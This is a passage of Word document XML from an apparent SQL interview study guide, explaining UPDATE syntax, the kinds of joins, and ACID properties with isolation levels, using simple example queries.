          <w:p w14:paraId="671EE085"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o need for transaction control (except TRUNCATE sometimes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26983FAF"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eeds transaction control (commit/rollback)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79277DF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summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B17A40C"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w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands deal with the structure and schema of the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD595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ML</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands deal with the actual data inside the tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7003364C" w14:textId="7F81CEA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3200" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9ADB50" w14:textId="6CC77FF0" w:rsidR="004A5A54" w:rsidRPr="00CE4B95" w:rsidRDefault="002C0B92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="758" w:name="_Toc197867972"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SQL Q</w:t>
      </w:r>
      <w:r w:rsidR="004A5A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- T</w:t>
      </w:r>
      <w:r w:rsidR="004A5A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>o update data in the table?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="758"/>
    </w:p>
    <w:p w14:paraId="75A31276" w14:textId="2B61FAC4"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o update data in a table, you can use the UPDATE statement in SQL. The general syntax for updating data in a table is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C08351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table_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9E037"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column1 = value1, column2 = value2, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B798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condition;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E82A1F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D2E51"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ppose you have an employees table with columns id, name, and department. If you want to update the department of an employee with id = 1 to "IT", the query would be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7736B73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employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09206286"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department = 'IT'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A706D8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id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0627568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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3005A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employees</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the table (employees) that you want to update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03560535"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T department = 'IT'</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the column (department) you want to update and the new value ('IT').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1612697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RE id = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The WHERE clause is crucial because it determines which record(s) will be updated. If you omit the WHERE clause, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all rows</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the table will be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63EDD0"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mportant Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A735A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ways use the WHERE clause to specify which record(s) to update. Without it, all rows in the table will be updated with the new values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C13EFF"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You can update multiple columns in one statement by separating each column-value pair with commas (as shown in the example above).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6051B8C1" w14:textId="562EE5C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3201" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDBE4DB" w14:textId="0EF78158" w:rsidR="004A5A54" w:rsidRPr="00CE4B95" w:rsidRDefault="009D2006">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="759" w:name="_Toc197867973"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of joins in the database</w:t>
      </w:r>
      <w:r w:rsidR="004A5A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="759"/>
    </w:p>
    <w:p w14:paraId="3453431A" w14:textId="2F9F8A12"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Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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76B9E7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54F55D7F"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only the rows that have matching values in both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6410B769"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ow is excluded from the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705935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954070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79DE43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F4901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4EDBA2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or LEFT OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B01C48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left table and the matched rows from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC528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right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385680F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99F97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A95DD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24E6B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 ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2587B24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or RIGHT OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE7932"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right table and the matched rows from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C7098"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left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D485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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABC39B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01FF54F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B6A2FC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 ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B81F7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or FULL OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799CFDB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when there is a match in one of the tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BE205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returns NULL for non-matching rows from both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB48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B4563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019F9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4F86FD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 ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A68E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78A26B4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urns the Cartesian product of both tables. That means it will return all possible combinations of rows between the two tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA04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this with caution as it can result in large result sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791DC6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1C2264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604436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3EFC1F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0FF0B23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Uses of Joins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0C1A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Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Joins allow you to combine related data from multiple tables into a single result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724181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liminating Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of storing repeated information in a single table, you can store it across multiple tables and link them using joins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56038C9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Querying Related Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Joins are essential when you need to access information that is split across different entities, like retrieving employee details with their corresponding department, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134EF9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 with Multiple Tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D86E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nsider two tables: employees and departments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780BDF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393B05" w:rsidRPr="00393B05" w14:paraId="536D2AF7" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A79E61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id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="317C184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00BC509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r>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="10FBF393" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E162BB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397AC3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CB6EF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631D67C2" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CBC0B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1C555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B02BD1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bl>
    <w:p w14:paraId="7A226B1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393B05" w:rsidRPr="00393B05" w14:paraId="378BAD74" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15736D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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="084E1BC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63DC36AB" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="048A1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161E6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0BC04696" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="122A2F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776F814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6A6093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you want to list employees with their department names, you would use an </w:t>
      </w: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xml:space="preserve"> to match the department_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FED9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6CF51F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2BDAF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1212D5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393B05" w:rsidRPr="00393B05" w14:paraId="14E425BF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7790287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706CB1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43DE10F0" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F88DAC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103E5F6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76418DF8" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393C94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42B90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4BF0681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help in relational database design by allowing efficient querying and retrieval of related data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F107B9" w14:textId="31E057F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3202" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CFDC50" w14:textId="53491173" w:rsidR="004A5A54" w:rsidRPr="00CE4B95" w:rsidRDefault="009E0966">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="760" w:name="_Toc197867974"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain ACID properties in the database</w:t>
      </w:r>
      <w:r w:rsidR="004A5A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="760"/>
    </w:p>
    <w:p w14:paraId="47C15206" w14:textId="5CEEFF2B"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CID</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> properties are a set of four properties that ensure reliable and consistent transactions in a database system. These properties stand for </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Atomicit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Consistenc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Isolation</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urability</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. They are crucial for maintaining the integrity of data during database transactions, especially in systems where multiple transactions are executed simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E74994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Atomicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A191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finition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Atomicity guarantees that a transaction is treated as a single "unit" of work. This means that either </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the operations in the transaction are successfully completed, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>none</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of them are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C11FD7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If any part of the transaction fails, the entire transaction is rolled back, and the database is left unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936BF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A7EB8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EGIN TRANSACTION;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7AB2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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014D7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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8DE85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MMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116A2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either update fails, none of the updates will take place, ensuring atomicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C559323"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EB13">
          <v:rect id="_x0000_i3203" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FAA1C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Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1DE1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Consistency ensures that a transaction transforms the database from one valid state to another valid state. The database must follow all rules, constraints, and triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5853917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A transaction that inserts a new order into the orders table and updates the inventory table must ensure that the quantity of the ordered item does not go below zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F752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4E13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SERT INTO orders (order_id, customer_id) VALUES (101, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485EBB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inventory SET quantity = quantity - 1 WHERE item_id = 500;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753B6AD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case of failure, the system will roll back to the state before the transaction, ensuring consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037DC67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EFF29">
          <v:rect id="_x0000_i3204" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B349F4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Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCF0F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xml:space="preserve">: Isolation prevents issues like </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dirty reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reading uncommitted data), </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-repeatable reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (data changing between reads), and </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>phantom reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (new rows being inserted by other transactions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FAF7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one transaction is updating the balance of a bank account, it should not be interfered with by another transaction attempting to read or modify the same data at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFB9D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688A0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Ensures transactions are executed serially (one at a time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274E3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Guarantees that a transaction reads the same data multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09472A4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Ensures that a transaction can only read committed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2D4B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 levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A4C4C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Uncommitted</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows dirty reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CFF3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Prevents dirty reads but allows non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45770E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Prevents dirty reads and non-repeatable reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036AE5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Prevents dirty reads, non-repeatable reads, and phantom reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEAB8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F97C4">
          <v:rect id="_x0000_i3205" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
